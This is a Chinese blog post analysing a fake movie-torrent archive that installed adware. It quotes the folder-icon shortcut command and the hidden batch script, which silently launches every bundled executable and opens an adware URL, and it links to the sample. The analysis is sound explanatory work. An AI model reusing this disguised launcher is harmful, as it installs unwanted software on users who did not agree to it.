首页 > 代码库 > 一次遇到流氓软件的经历

一次遇到流氓软件的经历

想看一部电影,下载好后,点开然后发现系统被装了一堆流氓软件,于是分析了压缩包的内容,发现些有趣的东西。

首先解压压缩包,进入解压后文件夹,发现都是链接(当时看到文件夹图标就点开了)

 

看看那个带有文件夹图标的属性

首先这是个快捷方式,然后运行一个命令

%windir%\system32\cmd.exe /c start 20140210\10.bat

cmd运行一个脚本,那个脚本在哪里呢,开启显示隐藏文件的属性后,再看那个解压后的文件夹

多了一个隐藏文件夹,打开一看

 

10.bat 那个脚本文件找到了,记事本打开看看

@echo off
for /f "delims=" %%a in (dir 20140210\  /s /b /a-d^|findstr /v /i "10.bat") do (start "" "%%a")
start http://t.hao168.pw/akdata/load.html?baidu-20140210-冰雪奇缘迅雷种子_高清完整BD版种子
exit

基本意思就是运行文件夹”冰雪奇缘迅雷种子_高清完整BD版种子”中exe文件

 

 

原理很简单,但是很容易中招,如果那个脚本运行的是一些危害计算机的代码,麻烦就大了。

有兴趣研究的可下载看看,不过要小心不要运行那个快捷方式

http://pan.baidu.com/s/1o60RYp8